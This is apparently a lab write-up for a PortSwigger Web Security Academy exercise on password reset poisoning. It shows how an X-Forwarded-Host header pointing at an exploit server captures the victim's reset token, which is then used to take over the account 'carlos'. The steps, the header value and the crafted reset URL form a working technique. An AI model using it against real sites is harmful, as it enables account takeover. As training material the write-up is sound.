# Password reset poisoning via middleware

## Description

[This lab](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-poisoning-via-middleware) is vulnerable to password reset poisoning. The user carlos will carelessly click on any links in emails that he receives.

## Reproduction and proof of concept

1. With Burp running, investigate the password reset functionality. Observe that a link containing a unique reset token is sent via email.
2. Send the ``POST /forgot-password`` request to Burp Repeater. Notice that the ``X-Forwarded-Host`` header is supported, and you can use it to point the dynamically generated reset link to an arbitrary domain.
3. Go to the exploit server and make a note of your exploit server URL.
4. Go back to the request in Burp Repeater and add the ``X-Forwarded-Host`` header with your exploit server URL:

```
X-Forwarded-Host: //exploit-0a6900b503fbfa43c55c132a015300bb.exploit-server.net
```

5. Change the ``username`` parameter to ``carlos`` and send the request.
6. Go to the exploit server and open the access log. You should see a ``GET /forgot-password`` request, which contains the victim's token as a query parameter. Make a note of this token.

```text
temp-forgot-password-token=DbzZ4lHeIfiXFSg7vHKSMl74XnyXDXKV
```

7. Go back to your email client and copy the valid password reset link (not the one that points to the exploit server). Paste this into your browser and change the value of the ``temp-forgot-password-token`` parameter to the value that you stole from the victim.

```text
https://0af600a703a2fac9c55d145800d00068.web-security-academy.net/forgot-password?temp-forgot-password-token=DbzZ4lHeIfiXFSg7vHKSMl74XnyXDXKV
```

8. Load this URL and set a new password for Carlos's account.
9. Log in to Carlos's account using the new password to solve the lab.

## Exploitability

An attacker can log in to `wiener:peter`. Any emails sent to this account can be read via the email client on the exploit server. The attacker will need to log in to Carlos's account.  
